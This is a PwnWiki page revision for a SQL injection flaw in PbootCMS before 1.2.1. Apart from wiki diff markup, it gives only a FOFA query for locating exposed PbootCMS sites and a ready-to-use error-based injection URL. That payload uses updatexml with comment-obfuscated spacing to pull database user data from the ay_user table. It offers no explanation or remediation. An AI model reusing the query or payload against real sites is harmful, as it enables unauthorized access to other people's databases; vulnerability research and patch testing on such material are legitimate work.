Difference between revisions of "PbootCMS ext price SQL注入漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> PbootCMS < 1.2.1 ==FOFA== <pre> app="PBOOTCMS" </pre> ==Payload== <pre> /index.php/Index?ext_price%3D1: and: upda...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
PbootCMS < 1.2.1 | PbootCMS < 1.2.1 | ||
Latest revision as of 14:35, 8 July 2021
漏洞影響
PbootCMS < 1.2.1
FOFA
app="PBOOTCMS"
Payload
/index.php/Index?ext_price%3D1/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/distinct/**/concat(0x23,user(),0x23)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Index?ext_price%3D1/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/distinct/**/concat(0x23,user(),0x23)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e),1));%23=123)
